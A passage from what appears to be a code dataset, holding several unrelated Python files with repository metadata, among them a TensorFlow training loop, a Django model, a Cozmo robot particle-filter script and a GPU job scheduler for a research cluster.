if i % 100 == 0 and i != 0 and save_model_path is not None:
                # Save the model; for the five-class task, save the model every 500 steps
import os
save_path = os.path.join(save_model_path, str(global_step_value))
if not os.path.exists(save_path):
os.mkdir(save_path)
save_path += '/model.ckpt'
print 'mode saved path is ', save_path
saver.save(sess, save_path)
if i % 100 == 0:
validation_images, validation_labels = val_data_set.get_next_batch()
validation_images = changed_shape(
validation_images,
[
len(validation_images),
sub_Config.IMAGE_W,
sub_Config.IMAGE_W,
1
]
)
validation_accuracy, validation_loss, summary, logits = sess.run(
[accuracy_tensor, loss_, merge_op, y],
feed_dict={
x: validation_images,
y_: validation_labels
}
)
calculate_acc_error(
logits=np.argmax(logits, 1),
label=validation_labels,
show=True
)
binary_acc = acc_binary_acc(
logits=np.argmax(logits, 1),
label=validation_labels,
)
val_writer.add_summary(summary, global_step_value)
print 'step is %d,training loss value is %g, accuracy is %g ' \
'validation loss value is %g, accuracy is %g, binary_acc is %g' % \
(global_step_value, loss_value, accuracy_value, validation_loss, validation_accuracy, binary_acc)
writer.close()
val_writer.close()
if __name__ == '__main__':
phase_name = 'ART'
state = ''
traindatapath = '/home/give/Documents/dataset/MedicalImage/MedicalImage/ROI/train'
valdatapath = '/home/give/Documents/dataset/MedicalImage/MedicalImage/ROI/val'
val_dataset = ValDataSet(new_size=[sub_Config.IMAGE_W, sub_Config.IMAGE_H],
phase=phase_name,
category_number=2,
shuffle=True,
data_path=valdatapath
)
train_dataset = ValDataSet(new_size=[sub_Config.IMAGE_W, sub_Config.IMAGE_H],
phase=phase_name,
category_number=2,
data_path=traindatapath,
shuffle=True,
)
train(
train_dataset,
val_dataset,
load_model_path=None,
save_model_path='/home/give/PycharmProjects/MedicalImage/Net/BaseNet/ResNet/models/fine_tuning/2-128/'
) | [
"[email protected]"
]
| |
efc54871703ecce3f1cb626bd1351abbdff392ef | 34ef83114e02b173bd2d55eb53ad399e738a8e3c | /django/test_bootstrap/blog/models.py | b12d7ddd4b0a24411e62b4e99bf00bcafa60e565 | []
| no_license | vavilon/Python3 | e976a18eb301e4953696d1e3f4730ed890da015a | 8c79729747ce51d60ad685e6a2e58292954ed7eb | refs/heads/master | 2023-01-09T13:44:37.408601 | 2018-01-25T22:41:14 | 2018-01-25T22:41:14 | 100,892,055 | 0 | 1 | null | 2022-12-26T20:29:27 | 2017-08-20T22:23:06 | Python | UTF-8 | Python | false | false | 506 | py | from django.db import models
# Create your models here.
from django.utils import timezone
class Post(models.Model):
author = models.ForeignKey('auth.User')
title = models.CharField(max_length=200)
text = models.TextField()
created_date = models.DateTimeField(
default=timezone.now)
published_date = models.DateTimeField(
blank=True, null=True
)
def publish(self):
self.published_date = timezone.now()
def __str__(self):
return self.title
| [
"[email protected]"
]
| |
3fac458c8f38d04e4724c1f19199c6c517b324b6 | 675b72eae65f8e258794decf9627e5fdf8b04559 | /plugin_tests/examples_test.py | aa8ae4a0e021a3a57aefdf2dd02021e68f45841a | [
"Apache-2.0"
]
| permissive | jbeezley/large_image | 368f730ea6fe2c4b75a9c3412c08ce8f41be545a | ac4cbaff4ae2fbbde425d3cd1aee2ff03e6235c8 | refs/heads/master | 2021-01-11T06:15:48.687563 | 2016-10-24T17:09:08 | 2016-10-24T17:09:08 | 71,806,470 | 0 | 0 | null | 2016-10-24T16:04:04 | 2016-10-24T16:04:03 | null | UTF-8 | Python | false | false | 1,695 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import os
import subprocess
import unittest
class LargeImageExamplesTest(unittest.TestCase):
def testAverageColor(self):
# Test running the program
testDir = os.path.dirname(os.path.realpath(__file__))
examplesDir = os.path.join(testDir, '../examples')
prog = 'average_color.py'
imagePath = os.path.join(os.environ['LARGE_IMAGE_DATA'],
'sample_image.ptif')
process = subprocess.Popen(
['python', prog, imagePath, '-m', '1.25'],
shell=False, stdout=subprocess.PIPE, cwd=examplesDir)
results = process.stdout.readlines()
self.assertEqual(len(results), 19)
finalColor = [float(val) for val in results[-1].split()[-3:]]
self.assertEqual(round(finalColor[0]), 245)
self.assertEqual(round(finalColor[1]), 247)
self.assertEqual(round(finalColor[2]), 247)
| [
"[email protected]"
]
| |
434153e344fd51bbd477726190b6bffce6f42c4d | 3de3dae722829727edfdd6cc3b67443a69043475 | /edexOsgi/com.raytheon.uf.common.dataplugin.text/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/text/subscription/request/SubscriptionRequest.py | 237472774c674b7b8fb879656ce996c5d08db82a | [
"LicenseRef-scancode-public-domain",
"Apache-2.0"
]
| permissive | Unidata/awips2 | 9aee5b7ec42c2c0a2fa4d877cb7e0b399db74acb | d76c9f96e6bb06f7239c563203f226e6a6fffeef | refs/heads/unidata_18.2.1 | 2023-08-18T13:00:15.110785 | 2023-08-09T06:06:06 | 2023-08-09T06:06:06 | 19,332,079 | 161 | 75 | NOASSERTION | 2023-09-13T19:06:40 | 2014-05-01T00:59:04 | Java | UTF-8 | Python | false | false | 1,268 | py | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# File auto-generated against equivalent DynamicSerialize Java class
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# Sep 05, 2014 bclement Generated
class SubscriptionRequest(object):
def __init__(self):
self.message = None
def getMessage(self):
return self.message
def setMessage(self, message):
self.message = message
| [
"[email protected]"
]
| |
d485028798e1c737f0af507daf3b21f679ec03ae | b55c368efdfe360123be1a2e7677cee53706d1f9 | /VectorTrans/Main.py | 7f33d97819742d7ae327669e60bb979628d2c4fb | [
"MIT"
]
| permissive | ZzhiWang/DRImplicitVecXform | 207cd6ef6edf5bc90b2abb1242e2d7bb3b322f95 | 2ec0c64fb098e29ce74929f5e19bce90b2f5791c | refs/heads/master | 2023-03-17T14:51:34.755756 | 2020-08-01T09:26:35 | 2020-08-01T09:26:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,904 | py | import numpy as np
from Tools import Preprocess
from VectorTrans.DRTrans import DRTrans
from VectorTrans.MDSTrans import MDSTrans
from VectorTrans.TSNETrans import TSNETrans
from VectorTrans.PCATrans import PCATrans
from VectorTrans.MDSTransPlus import MDSTransPlus
from VectorTrans.TSNETransPlus import TSNETransPlus
from VectorTrans.CreateJson import JsonFile
def load_data():
X = np.loadtxt("..\\Data\\data.csv", dtype=np.float, delimiter=",")
label = np.loadtxt("..\\Data\\label.csv", dtype=np.int, delimiter=",")
return X, label
def run_example():
dr_method = 'MDS' # 'MDS' 't-SNE' 'PCA' 'MDSPlus' 't-SNEPlus'
X, label = load_data()
repeat = Preprocess.has_repeat(X)
if repeat:
print("Please recheck the input data for duplicate points")
return
X = Preprocess.normalize(X) # Optional
(n, d) = X.shape
trans = DRTrans()
if dr_method == 'MDS':
trans = MDSTrans(X, label=label, y_init=None, y_precomputed=False)
elif dr_method == 't-SNE':
trans = TSNETrans(X, label=label, y_init=None, perplexity=30.0)
elif dr_method == 'PCA':
trans = PCATrans(X, label=label)
elif dr_method == "MDSPlus":
trans = MDSTransPlus(X, label=label, y_init=None, y_precomputed=False)
elif dr_method == "t-SNEPlus":
trans = TSNETransPlus(X, label=label, y_init=None, perplexity=30.0)
else:
print("This method is not supported at this time: ", dr_method)
return
trans.transform(nbrs_k=20, MAX_EIGEN_COUNT=4, yita=0.1)
np.savetxt("..\\Data\\"+str(dr_method)+"_Y.csv", trans.Y, fmt='%.18e', delimiter=",")
if n*d < 1024 ** 3 / 2:
np.savetxt("..\\Data\\"+str(dr_method)+"_derivative.csv", trans.derivative, fmt='%.18e', delimiter=",")
json_file = JsonFile(path="..\\Data\\")
json_file.create_file(trans)
if __name__ == '__main__':
run_example()
| [
"[email protected]"
]
| |
b9fc0ded63c3c6f0ff7857c261a68f18076d6d8e | 9dc8c299ee7d4a225002127cc03b4253c8a721fd | /libs/unittest/live_related_condition.py | 5604fdc9fc852993f3b40a2a692f9a1c3da1f49b | []
| no_license | namesuqi/strategy_corgi | 5df5d8c89bdf7a7c465c438048be20ef16120f4f | 557b8f8eabf034c2a57c25e6bc581858dd4f1b6e | refs/heads/master | 2020-03-07T04:00:18.313901 | 2018-03-29T07:50:50 | 2018-03-29T07:50:50 | 127,253,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,149 | py | # !/usr/bin/python
# coding=utf-8
# author: JinYiFan
from config import *
from libs.module.live_seeds import *
import time
def wait_for_second(wait_time):
time.sleep(wait_time)
def change_config(live_file_count, live_peer_count, rate_of_peer_and_file):
"""
    Modify the parameter settings of the config
    :param live_file_count: total number of files
    :param live_peer_count: total number of playing peers
    :param rate_of_peer_and_file: number of playing peers per file
"""
orm.session.query(Configs).filter(Configs.role == "live_file_count").update(
{"content": live_file_count})
orm.session.query(Configs).filter(Configs.role == "live_peer_count").update(
{"content": live_peer_count})
orm.session.query(Configs).filter(Configs.role == "rate_of_peer_and_file").update(
{"content": rate_of_peer_and_file})
orm.session.commit()
orm.session.close()
def change_peer_flow_to_0():
"""
    Set the peers' CDN and P2P traffic to 0
"""
orm.session.query(Live_Peer).update({"cdn": 0, "p2p": 0})
orm.session.commit()
orm.session.close()
def change_LF_flow_to_0():
"""
    Set the LF (seed) nodes' CDN and P2P traffic to 0
"""
orm.session.query(Live_Seed).update({"upload": 0, "download": 0})
orm.session.commit()
orm.session.close()
def add_player(play_num):
"""
    Add playing peers
    :param play_num: number of playing peers to add
"""
peer_num_infos = orm.session.query(Live_Online).offset(200).limit(play_num).all()
file_id = orm.session.query(Live_Peer).first().file_id
num = 0
for num in range(play_num):
live_peer_sdk = Live_Peer(peer_id=peer_num_infos[num].peer_id, version=peer_num_infos[num].sdk_version,
country=peer_num_infos[num].country, province_id=peer_num_infos[num].province_id,
city_id=peer_num_infos[num].city_id, isp_id=peer_num_infos[num].isp_id,
file_id=file_id, chunk_id=get_random_chunk_id(), operation=OPERATION, cdn=CDN,
p2p=P2P, ssid=peer_num_infos[num].ssid, p2penable=P2PENABLE)
orm.session.add(live_peer_sdk)
num += 1
orm.session.commit()
orm.session.close()
def one_peer_multi_channel(channel_num):
"""
    Have one playing peer play multiple channels
    :param channel_num: number of channels played by the single peer
"""
peer_info = orm.session.query(Live_Peer).first()
file_info = orm.session.query(Live_File).offset(5).limit(channel_num).all()
for num in range(channel_num - 1):
live_peer_sdk = Live_Peer(peer_id=peer_info.peer_id, version=peer_info.version, country=peer_info.country,
province_id=peer_info.province_id, city_id=peer_info.city_id, isp_id=peer_info.isp_id,
file_id=file_info[num].file_id, chunk_id=get_random_chunk_id(), operation=OPERATION,
cdn=CDN, p2p=P2P, ssid=peer_info.ssid, p2penable=P2PENABLE)
orm.session.add(live_peer_sdk)
num += 1
orm.session.commit()
orm.session.close()
def del_player(del_num):
"""
    Delete playing peers
    :param del_num: number of playing peers to delete
"""
peer_infos = orm.session.query(Live_Peer).all()
session_ids = list()
for peer_info in peer_infos:
session_ids.append(peer_info.ssid)
num = 0
for num in range(del_num):
orm.session.query(Live_Peer).filter_by(ssid=session_ids[num]).delete()
num += 1
orm.session.commit()
orm.session.close()
def del_seed(del_num):
"""
    Delete seed ("Lei Feng") nodes
    :param del_num: number of seed nodes to delete
"""
seed_infos = orm.session.query(Live_Seed).all()
session_ids = list()
for seed_info in seed_infos:
session_ids.append(seed_info.ssid)
num = 0
for num in range(del_num):
orm.session.query(Live_Seed).filter_by(ssid=session_ids[num]).delete()
num += 1
orm.session.commit()
orm.session.close()
if __name__ == "__main__":
del_seed(20)
# add_player(3)
# one_peer_multi_channel(3)
# del_player(2)
| [
"[email protected]"
]
| |
b8acc579b13a7bb35130f20698e3489073b14792 | 773deb7825ff84eec3e0cf6ae8266d07251df392 | /CHAPTER05/bw41.py | c7231b7bd8d7d2ba190f52df2a0fa74e6f62a961 | []
| no_license | kji0205/py | 3ca9c2a351af05ce62d7c7c3c261ed98a7e8290d | b45ffb3424b7c0da8192d431cb7ad7933c60ef81 | refs/heads/master | 2021-01-20T18:57:51.603386 | 2016-06-23T14:24:57 | 2016-06-23T14:24:57 | 61,639,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | # Consider concurrent.futures for true parallelism
import logging
from pprint import pprint
from sys import stdout as STDOUT
from time import time
def gcd(pair):
a, b = pair
low = min(a, b)
for i in range(low, 0, -1):
if a % i == 0 and b % i == 0:
return i
numbers = [(1963309, 2265973), (2030677, 3814172),
(1551645, 2229620), (2039045, 2020802)]
start = time()
results = list(map(gcd, numbers))
end = time()
print('Took %.3f seconds' % (end - start))
#
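# Same work split across two threads: for a CPU-bound function like gcd the GIL lets only one thread
# run Python bytecode at a time, so this is typically no faster than the serial version above.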
from concurrent.futures import ThreadPoolExecutor
start = time()
pool = ThreadPoolExecutor(max_workers=2)
results = list(pool.map(gcd, numbers))
end = time()
print('Took %.3f seconds' % (end - start))
#
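# Worker processes sidestep the GIL, so the gcd calls can run truly in parallel. Note: with the spawn start
# method (e.g. on Windows) this top-level code would normally need an `if __name__ == '__main__':` guard.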
from concurrent.futures import ProcessPoolExecutor
start = time()
pool = ProcessPoolExecutor(max_workers=2)
results = list(pool.map(gcd, numbers))
end = time()
print('Took %.3f seconds' % (end - start))
| [
"[email protected]"
]
| |
b92db110450f2c14108bb1fe808f9ce2eb57621f | 2d1649a7a00d49b72ed7e53afa4abb3c9281ce03 | /.history/ParticleFilter/go_to_goal_20190422001746.py | b97cd844c688b0223ebd64a788ff07412f228001 | []
| no_license | joshzhang5/CS3630Lab6 | 9547dc6c89198e9bb4aebd8359d4feb974082d20 | 69e6df12829e18a211ae850236d74b4d728046ef | refs/heads/master | 2020-05-15T13:59:51.906195 | 2019-04-22T18:21:42 | 2019-04-22T18:21:42 | 182,317,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,111 | py | # Jiaxi Zhang
# George McAlear
try:
import matplotlib
matplotlib.use('TkAgg')
except ImportError:
pass
from skimage import color
import numpy as np
from numpy.linalg import inv
import threading
import time
import sys
import asyncio
from PIL import Image
from markers import detect, annotator
from grid import CozGrid
from gui import GUIWindow
from particle import Particle, Robot
from setting import *
from particle_filter import *
from utils import *
from time import sleep
import time
import asyncio
import cozmo
from cozmo.util import distance_mm, degrees, speed_mmps, Pose
#particle filter functionality
class ParticleFilter:
def __init__(self, grid):
self.particles = Particle.create_random(PARTICLE_COUNT, grid)
self.grid = grid
def update(self, odom, r_marker_list):
# ---------- Motion model update ----------
self.particles = motion_update(self.particles, odom)
# ---------- Sensor (markers) model update ----------
self.particles = measurement_update(self.particles, r_marker_list, self.grid)
# ---------- Show current state ----------
# Try to find current best estimate for display
m_x, m_y, m_h, m_confident = compute_mean_pose(self.particles)
return (m_x, m_y, m_h, m_confident)
class CozmoWarehouseWorker:
def __init__(self, robot: cozmo.robot.Robot):
self.current_arena_pose = None
self.current_robot_pose = robot.pose
self.robot = robot
# start streaming
robot.camera.image_stream_enabled = True
robot.camera.color_image_enabled = False
robot.camera.enable_auto_exposure()
# Obtain the camera intrinsics matrix
fx, fy = robot.camera.config.focal_length.x_y
cx, cy = robot.camera.config.center.x_y
self.camera_settings = np.array([
[fx, 0, cx],
[ 0, fy, cy],
[ 0, 0, 1]
], dtype=np.float)
self.pick_up_pose = Pose(x=4.5, y=12.75, z=0, angle_z=degrees(90))
self.drop_off_pose = Pose(x=21.75, y=12.75, z=0, angle_z=degrees(90))
self.drop_off_directions = [Pose(x=3, y=4.5, z=0, angle_z=degrees(0)), Pose(x=21.75, y=4.5, z=0, angle_z=degrees(90)), self.drop_off_pose]
self.pick_up_directions = [Pose(x=21.75, y=4.5, z=0, angle_z=degrees(90)), Pose(x=3, y=4.5, z=0, angle_z=degrees(0)), self.pick_up_pose]
self.drive_speed = speed_mmps(50)
self.grid = CozGrid("map_arena.json")
self.pf = ParticleFilter(self.grid)
threading.Thread(target=self.runGUI).start()
def runGUI(self):
self.gui = GUIWindow(self.grid, show_camera=True)
self.gui.show_particles(self.pf.particles)
self.gui.show_mean(0, 0, 0)
self.gui.start()
async def drive_to(self, directions):
print("-" * 20 + "DRIVING" + "-" * 20)
if isinstance(directions, (list,)):
for pose in directions:
await self.__drive_to_pose(pose)
else:
await self.__drive_to_pose(directions)
async def __drive_to_pose(self, pose):
print("We are at ", self.current_arena_pose, " and we are driving to ", pose)
translation = (pose - self.current_arena_pose).position
directions = Pose(x=translation.x, y=translation.y, z=0, angle_z=pose.rotation.angle_z)
print("We will follow these directions: ", directions, "\n\n")
await self.__execute_directions(directions)
print("Directions followed!", "\n\n")
self.update_current_arena_pose()
async def __execute_directions(self, directions):
print("Current arena pose is:", self.current_arena_pose, "\n\n")
print("Current robot pose is:", self.robot.pose, "\n\n")
await self.robot.turn_in_place(angle=degrees(-self.current_arena_pose.rotation.angle_z.degrees)).wait_for_completed()
print("ROBOT is at AFTER TURNING to be parallel to X: ", self.robot.pose, "\n\n")
await self.robot.drive_straight(distance=distance_mm(directions.position.x * self.grid.scale), speed=self.drive_speed).wait_for_completed()
print("ROBOT is at AFTER DRIVING in the X direction: ", self.robot.pose, "\n\n")
await self.robot.turn_in_place(angle=degrees(90)).wait_for_completed()
print("ROBOT is at AFTER TURNING to be parallel to Y: ", self.robot.pose, "\n\n")
await self.robot.drive_straight(distance=distance_mm(directions.position.y * self.grid.scale), speed=self.drive_speed).wait_for_completed()
print("ROBOT is at AFTER DRIVING in the Y direction: ", self.robot.pose, "\n\n")
print("ROBOT is TURNING ", diff_heading_deg(directions.rotation.angle_z.degrees, 90), "degrees.", "\n\n")
await self.robot.turn_in_place(angle=degrees(diff_heading_deg(directions.rotation.angle_z.degrees, 90))).wait_for_completed()
print("ROBOT is at AFTER FINAL TURN", self.robot.pose, "\n\n")
def update_current_arena_pose(self):
print("-" * 20 + "UPDATING POSE" + "-" * 20)
coordinate_systems_diff = diff_heading_deg(self.current_robot_pose.rotation.angle_z.degrees, self.current_arena_pose.rotation.angle_z.degrees)
print("robot pose before we moved was: ", self.current_robot_pose)
print("My diff heading degree is: ")
arena_initial_pose_mm = rotate_point(self.current_robot_pose.position.x, self.current_robot_pose.position.y, coordinate_systems_diff)
arena_final_pose_mm = rotate_point(self.robot.pose.position.x, self.robot.pose.position.y, coordinate_systems_diff)
d_x = arena_final_pose_mm[0] - arena_initial_pose_mm[0]
d_y = arena_final_pose_mm[1] - arena_initial_pose_mm[1]
d_heading = self.robot.pose.rotation.angle_z - self.current_robot_pose.rotation.angle_z
difference_pose = convertPoseFromMmToInches(Pose(x=d_x, y=d_y, z=0, angle_z=d_heading))
print("We think we moved ", difference_pose, "\n\n")
self.current_arena_pose = self.current_arena_pose + difference_pose
print("Current pose is now ", self.current_arena_pose, "\n\n")
async def pick_up_cube(self, tries=5):
print("-" * 20 + "GETTING CUBE" + "-" * 20)
cube = await self.robot.world.wait_for_observed_light_cube(timeout=30)
print("Found cube: %s" % cube)
picked_up_cube = await self.robot.pickup_object(cube, num_retries=tries).wait_for_completed().obj
if (picked_up_cube == None):
print("Could not get the cube.")
await self.robot.say_text("Help me!").wait_for_completed()
            await asyncio.sleep(5)
else:
print("Picked up cube!")
async def set_down_cube(self):
print("-" * 20 + "SETTING DOWN CUBE" + "-" * 20)
await self.robot.set_lift_height(0.0).wait_for_completed()
await self.robot.set_head_angle(degrees(3)).wait_for_completed()
async def localize(self, turn_angle=20):
print("-" * 20 + "LOCALIZING" + "-" * 20)
# reset our location estimates
conf = False
self.current_arena_pose = Pose(0,0,0,angle_z=degrees(0))
self.pf = ParticleFilter(self.grid)
# reset lift and head
await self.robot.set_lift_height(0.0).wait_for_completed()
await self.robot.set_head_angle(degrees(3)).wait_for_completed()
while not conf:
# move a little
self.current_robot_pose = self.robot.pose
await self.robot.turn_in_place(angle=degrees(turn_angle)).wait_for_completed()
odometry = self.__compute_odometry()
detected_markers, camera_image = await self.__marker_processing()
# update, motion, and measurment with the odometry and marker data
curr_x, curr_y, curr_h, conf = self.pf.update(odometry, detected_markers)
# update gui
self.gui.show_particles(self.pf.particles)
self.gui.show_mean(curr_x, curr_y, curr_h)
self.gui.show_camera_image(camera_image)
self.gui.updated.set()
self.current_arena_pose = Pose(curr_x , curr_y, 0, angle_z=degrees(curr_h))
print("We localized to arena location ", self.current_arena_pose)
def __compute_odometry(self, cvt_inch=True):
'''
Compute the odometry given the current pose of the robot (use robot.pose)
Input:
- curr_pose: a cozmo.robot.Pose representing the robot's current location
- cvt_inch: converts the odometry into grid units
Returns:
- 3-tuple (dx, dy, dh) representing the odometry
'''
last_x, last_y, last_h = self.current_robot_pose.position.x, self.current_robot_pose.position.y, \
self.current_robot_pose.rotation.angle_z.degrees
curr_x, curr_y, curr_h = self.robot.pose.position.x, self.robot.pose.position.y, \
self.robot.pose.rotation.angle_z.degrees
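        # express the displacement in the previous pose's frame (rotate_point applies the -last_h rotation)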
dx, dy = rotate_point(curr_x-last_x, curr_y-last_y, -last_h)
if cvt_inch:
dx, dy = dx / self.grid.scale, dy / self.grid.scale
return (dx, dy, diff_heading_deg(curr_h, last_h))
async def __marker_processing(self, show_diagnostic_image=False):
'''
Obtain the visible markers from the current frame from Cozmo's camera.
Since this is an async function, it must be called using await, for example:
markers, camera_image = await marker_processing(robot, camera_settings, show_diagnostic_image=False)
Input:
- robot: cozmo.robot.Robot object
- camera_settings: 3x3 matrix representing the camera calibration settings
- show_diagnostic_image: if True, shows what the marker detector sees after processing
Returns:
- a list of detected markers, each being a 3-tuple (rx, ry, rh)
(as expected by the particle filter's measurement update)
- a PIL Image of what Cozmo's camera sees with marker annotations
'''
# Wait for the latest image from Cozmo
image_event = await self.robot.world.wait_for(cozmo.camera.EvtNewRawCameraImage, timeout=30)
# Convert the image to grayscale
image = np.array(image_event.image)
image = color.rgb2gray(image)
# Detect the markers
markers, diag = detect.detect_markers(image, self.camera_settings, include_diagnostics=True)
# Measured marker list for the particle filter, scaled by the grid scale
marker_list = [marker['xyh'] for marker in markers]
marker_list = [(x/self.grid.scale, y/self.grid.scale, h) for x,y,h in marker_list]
# Annotate the camera image with the markers
if not show_diagnostic_image:
annotated_image = image_event.image.resize((image.shape[1] * 2, image.shape[0] * 2))
annotator.annotate_markers(annotated_image, markers, scale=2)
else:
diag_image = color.gray2rgb(diag['filtered_image'])
diag_image = Image.fromarray(np.uint8(diag_image * 255)).resize((image.shape[1] * 2, image.shape[0] * 2))
annotator.annotate_markers(diag_image, markers, scale=2)
annotated_image = diag_image
return marker_list, annotated_image
async def run(robot: cozmo.robot.Robot):
cosimo = CozmoWarehouseWorker(robot)
await cosimo.localize()
await cosimo.drive_to(cosimo.pick_up_pose)
while True:
await cosimo.pick_up_cube(tries=5)
await cosimo.drive_to(cosimo.drop_off_directions)
await cosimo.set_down_cube()
await cosimo.drive_to(cosimo.pick_up_directions)
class CozmoThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self, daemon=False)
def run(self):
cozmo.robot.Robot.drive_off_charger_on_connect = False # Cozmo can stay on his charger
cozmo.run_program(run, use_viewer=False)
if __name__ == '__main__':
# cozmo thread
cozmo_thread = CozmoThread()
cozmo_thread.start()
| [
"[email protected]"
]
| |
4c7ea5619cc66f92ba1b9905cdc2da6911ed9e1f | b2d3bd39b2de8bcc3b0f05f4800c2fabf83d3c6a | /examples/pwr_run/checkpointing/throughput/final3/main.py | 7a486cdf102a8565fccfdac8cf8ebbcbaf5f011c | [
"MIT"
]
| permissive | boringlee24/keras_old | 3bf7e3ef455dd4262e41248f13c04c071039270e | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | refs/heads/master | 2021-11-21T03:03:13.656700 | 2021-11-11T21:57:54 | 2021-11-11T21:57:54 | 198,494,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,723 | py | import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
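# Simulated arrival trace: jobs in `queue` arrive in order with Poisson-distributed inter-arrival times
# (mean 30 s); queue_dict maps each job to its arrival time in seconds after queue_timer is set.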
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
with open('k80_time.json', 'r') as fp:
k80_time = json.load(fp)
with open('data/pwr.json', 'r') as fp:
pwr_dict = json.load(fp)
with open('data/util.json', 'r') as fp:
util_dict = json.load(fp)
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
V100_epoch_time = {}
for item in queue:
V100_epoch_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
promote_start_time = {}
for item in queue:
promote_start_time[str(item)] = 0
demote_list = []
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
index = 0
all_jobs_started = False
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1024'
host_node = 'c0168'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('x_data.json') as f:
x_train = json.load(f)
with open('y_data.json') as f:
y_train = json.load(f)
model = neighbors.KNeighborsRegressor(n_neighbors = 1, weights='distance')
model.fit(x_train, y_train)
####################################################################
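# The 1-nearest-neighbor regressor above is used later to predict a job's K80-to-V100 speedup from three
# profiled features (x1 = a power reading from data/pwr.json, x2 = 3600 / the job's k80_time.json entry,
# x3 = a utilization reading from data/util.json); its output is divided by 100 to match the fractional
# speedup measured in check_step2_complete.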
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
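# Promotion policy once all jobs have arrived: rank K80 jobs eligible for promotion and V100 jobs eligible
# for demotion by estimated speedup, keep the highest-speedup jobs on the V100s, and skip a swap when the
# candidate's speedup advantage over the job it would displace is under 0.1 (lazy migration).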
